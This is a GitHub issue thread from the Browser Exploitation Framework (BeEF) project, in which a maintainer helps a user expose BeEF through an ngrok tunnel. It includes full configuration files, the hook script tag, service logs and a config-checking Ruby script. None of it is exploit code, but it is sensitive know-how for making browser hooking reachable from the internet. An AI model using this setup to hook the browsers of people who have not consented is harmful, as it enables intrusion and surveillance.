beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

beef-xss with ngrok is not working :( #1942

Closed azamet90 closed 4 years ago

azamet90 commented 4 years ago

The wiki page is not enough to understand. If I put the link and change the port, BeEF gives error -1. I tried every type of link and port to add to the config.yaml but no luck. Can anyone please put the steps here so that we can understand it?

[screenshot]

If I don't change the port: [screenshot]

[screenshots]

bcoles commented 4 years ago

@azamet90 If you want assistance, you'll have to put in some effort.

We tried to help you ages ago but you stopped responding.

Please show your configuration and any logs and error messages.

Please describe what steps you have taken to resolve the issue.

Please carefully read the FAQ again.

azamet90 commented 4 years ago

> @azamet90 If you want assistance, you'll have to put in some effort.
>
> We tried to help you ages ago but you stopped responding.
>
> Please show your configuration and any logs and error messages.
>
> Please describe what steps you have taken to resolve the issue.
>
> Please carefully read the FAQ again.
>
> * https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

I did it, please check the images I posted. Thanks for replying so fast, but it is still not working.

ghost commented 4 years ago

same

bcoles commented 4 years ago

See your configuration here:

[screenshot]

Where you have host, that field is the BeEF host, not the ngrok host.

You need to change public, not host, as described on the wiki.

Also, do not include the URL scheme http://.

Also, when testing, do not use HTTPS. That will make testing more difficult and harder to diagnose the issue.

bcoles commented 4 years ago

If you start with a clean configuration file, literally all you have to do is change these two fields:

        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental)

If you are changing more than these two fields, you are doing something wrong.

azamet90 commented 4 years ago

> If you start with a clean configuration file, all you have to do is change these two fields:
>
>         public: "<your-id>.ngrok.io"      # public hostname/IP address
>         public_port: "80"                 # public port (experimental)

beef:
  version: 0.5.0.0
  debug: false
  client_debug: false
  crypto_default_value_length: 80
  credentials:
    user: beef
    passwd: Deneme123..1..1
  restrictions:
    permitted_hooking_subnet:
    - 0.0.0.0/0
    - "::/0"
    permitted_ui_subnet:
    - 0.0.0.0/0
    - "::/0"
    api_attempt_delay: '0.05'
  http:
    debug: false
    host: 0.0.0.0
    port: '3000'
    xhr_poll_timeout: 1000
    hook_file: "/hook.js"
    hook_session_name: BEEFHOOK
    restful_api:
      allow_cors: false
      cors_allowed_domains: http://browserhacker.com
    websocket:
      enable: false
      port: 61985
      secure: true
      secure_port: 61986
      ws_poll_timeout: 1000
      ws_connect_timeout: 500
    web_server_imitation:
      enable: true
      type: apache
      hook_404: false
      hook_root: false
    https:
      enable: false
      key: beef_key.pem
      cert: beef_cert.pem
  database:
    file: db/beef.db
  autorun:
    result_poll_interval: 300
    result_poll_timeout: 5000
    continue_after_timeout: true
  dns_hostname_lookup: false
  geoip:
    enable: true
    database: "/var/lib/GeoIP/GeoLite2-City.mmdb"
  integration:
    phishing_frenzy:
      enable: false
  extension:
    admin_ui:
      enable: true
      base_path: "/ui"
    demos:
      enable: true
    events:
      enable: true
    evasion:
      enable: false
    requester:
      enable: true
    proxy:
      enable: true
    network:
      enable: true
    metasploit:
      enable: false
    social_engineering:
      enable: true
    xssrays:
      enable: true

I cannot see that option in the default config.yaml file. It is preinstalled on the Kali distro. Does it mean I need to add some extra line? If so, where?

bcoles commented 4 years ago

> Does it mean I need to add some extra line? If so, where?

Yes, you do not have the correct fields. See CHANGEME below.

#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.0.0-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "123"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false
        #public: ""      # public hostname/IP address    <--- CHANGEME
        #public_port: "" # public port (experimental)    <--- CHANGEME

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
        database: '/opt/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true

azamet90 commented 4 years ago

> public:

It is very different on mine, as you can see, sir... Can I just copy this and put it into my config.yaml file? Will it also work without errors if I do it?

bcoles commented 4 years ago

> It is very different on mine, as you can see, sir... Can I just copy this and put it into my config.yaml file? Will it also work without errors if I do it?

There's one way to find out.

bcoles commented 4 years ago

Actually, no, don't copy my entire configuration file.

Just put these two lines under beef -> http :

beef:
    # ... snip ...
    http:
    # ... snip ...
        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental)
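A quick way to confirm that exactly those two fields are in place before starting the service (an added example, not BeEF project code): it loads the config.yaml, reports the mistakes seen in this thread (public/public_port missing, the ngrok name written into host: instead of public:, a URL scheme inside public), and prints the hook URL a hooked page would load. The two sample configs are constructed, and the hook URL format is an assumption for this example (public, public_port and hook_file joined, port omitted for plain HTTP on 80); BeEF's own URL handling is not shown on this page.

```ruby
# Added example, not part of BeEF: sanity-check the ngrok-related fields in a
# BeEF config.yaml before starting the service.
require 'yaml'

# Constructed sample: the two fields added under beef -> http as advised above.
GOOD_CONFIG = <<~YAML
  beef:
    http:
      host: "0.0.0.0"
      port: "3000"
      hook_file: "/hook.js"
      public: "your-id.ngrok.io"
      public_port: "80"
YAML

# Constructed sample: tunnel hostname (with scheme) pasted into host:,
# and no public/public_port at all.
BAD_CONFIG = <<~YAML
  beef:
    http:
      host: "http://your-id.ngrok.io"
      port: "3000"
      hook_file: "/hook.js"
YAML

# Returns an array of problem descriptions; empty means the fields look right.
def check_public_settings(yaml_text)
  http = YAML.safe_load(yaml_text).dig('beef', 'http')
  return ['beef.http section not found'] unless http.is_a?(Hash)

  problems = []
  pub = http['public'].to_s
  if pub.empty?
    problems << 'beef.http.public is not set (add it under beef -> http)'
  elsif pub.match?(%r{\A[a-z][a-z0-9+.-]*://}i)
    problems << "beef.http.public must be a bare hostname, no URL scheme: #{pub}"
  elsif pub.include?('/') || pub.include?(':')
    problems << "beef.http.public must not contain a path or port: #{pub}"
  end

  port = http['public_port'].to_s
  if port.empty?
    problems << 'beef.http.public_port is not set'
  elsif !port.match?(/\A\d+\z/) || !(1..65_535).cover?(port.to_i)
    problems << "beef.http.public_port is not a valid TCP port: #{port}"
  end

  # host: is the local bind address; the ngrok name belongs in public:
  if http['host'].to_s.include?('ngrok')
    problems << 'beef.http.host contains the ngrok hostname; put it in public: and keep host as the bind address'
  end
  problems
end

# Hook URL a hooked page would load. Assumption for this example: built from
# public, public_port and hook_file, with the port dropped when it is the
# scheme default (80 for http, 443 for https).
def hook_url(yaml_text)
  http = YAML.safe_load(yaml_text).dig('beef', 'http')
  scheme = http.dig('https', 'enable') ? 'https' : 'http'
  port = http['public_port'].to_s.empty? ? http['port'].to_s : http['public_port'].to_s
  default_port = scheme == 'http' ? '80' : '443'
  authority = port == default_port ? http['public'].to_s : "#{http['public']}:#{port}"
  "#{scheme}://#{authority}#{http['hook_file'] || '/hook.js'}"
end

if __FILE__ == $PROGRAM_NAME
  { 'good' => GOOD_CONFIG, 'bad' => BAD_CONFIG }.each do |name, text|
    problems = check_public_settings(text)
    if problems.empty?
      puts "#{name}: ok, hook would be loaded from #{hook_url(text)}"
    else
      puts "#{name}:", problems.map { |p| "  - #{p}" }
    end
  end
end
```

Run it with a real file by replacing the constructed samples with File.read of your config.yaml; an empty problem list plus a hook URL that matches the http forwarding line ngrok prints is the state the replies above are steering toward.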

bcoles commented 4 years ago

Also, when you pasted your configuration file above, you also pasted your password. You might want to change it.

azamet90 commented 4 years ago

> Also, when you pasted your configuration file above, you also pasted your password. You might want to change it.

[screenshots]

:-/ What am I still doing wrong, sir?

bcoles commented 4 years ago

> :-/ What am I still doing wrong, sir?

Try testing with HTTP not HTTPS

Also, try testing with the demo page.

Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.

azamet90 commented 4 years ago

> :-/ What am I still doing wrong, sir?
>
> Try testing with HTTP not HTTPS
>
> Also, try testing with the demo page.
>
> Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.

The result is the same, I cannot see my browser there :-/

bcoles commented 4 years ago

> The result is the same, I cannot see my browser there :-/

It seems like you've got ngrok working. Congratulations!

The issue you face is another one.

If you want assistance, you'll have to put in some effort.

Please show your configuration and any logs and error messages.

Please describe what steps you have taken to resolve the issue.

azamet90 commented 4 years ago

First I started ngrok with ngrok --start all

Session Status                online                                                            
Account                       xxxxx (Plan: Free)                                               
Version                       2.3.35                                                            
Region                        United States (us)                                                
Web Interface                 http://127.0.0.1:4040                                             
Forwarding                    http://xxxxxx.ngrok.io -> http://localhost:80               
Forwarding                    https://xxxxxx.ngrok.io -> http://localhost:80              
Forwarding                    http://xxxxxxxx.ngrok.io -> http://localhost:3000             
Forwarding                    https://xxxxxx.ngrok.io -> http://localhost:3000            

Connections                   ttl     opn     rt1     rt5     p50     p90                       
                              0       0       0.00    0.00    0.00    0.00  

After that I put the link given for port 80 into the beef config.yaml:

    public: "xxxxxx.ngrok.io"      # public hostname/IP address
    public_port: "80"                 # public port (experimental)

After that I started beef-xss:

sudo beef-xss
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2020-06-14 16:57:01 +03; 5s ago
   Main PID: 22296 (ruby)
      Tasks: 4 (limit: 18967)
     Memory: 73.4M
     CGroup: /system.slice/beef-xss.service
             └─22296 ruby /usr/share/beef-xss/beef

Haz 14 16:57:01 MrRobots systemd[1]: Started beef-xss.
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Browser Exploitation Framework (BeEF)….5.0.0
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Twit: @beefproject
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Site: https://beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Blog: http://blog.beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |_  Wiki: https://github.com/beefproj…f/wiki
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Project Creator: Wade Alcorn (@WadeAlcorn)
Haz 14 16:57:02 MrRobots beef[22296]: -- migration_context()
Haz 14 16:57:02 MrRobots beef[22296]:    -> 0.0033s
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] BeEF is loading. Wait a few seconds...
Hint: Some lines were ellipsized, use -l to show in full.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1..

After that I put the JS code after the head, like this one:

This is the ngrok link which is for port 3000.

After I logged in to the browser with the port 3000 ngrok link [screenshot] and opened the page with the beef script [screenshot], there is no session... Where are the logs?

bcoles commented 4 years ago

The Web Starter Kit is not the demo page. Is it hosted on HTTPS?

Use the HTTP demo page: http://your.ngrok.address/demos/basic.html

> there is no session... Where are the logs?

There are browser logs in the browser console. On Firefox, press CTRL+SHIFT+K and look at the console for error messages. You may also want to look at the Network tab to view the network traffic.

The server logs are usually stored in ~/.beef/. The logs are also displayed in the terminal when BeEF is started; however, since BeEF runs as the beef-xss service on Kali, you may need to look in journalctl.

azamet90 commented 4 years ago

After this log I fixed my problem, thank you so much.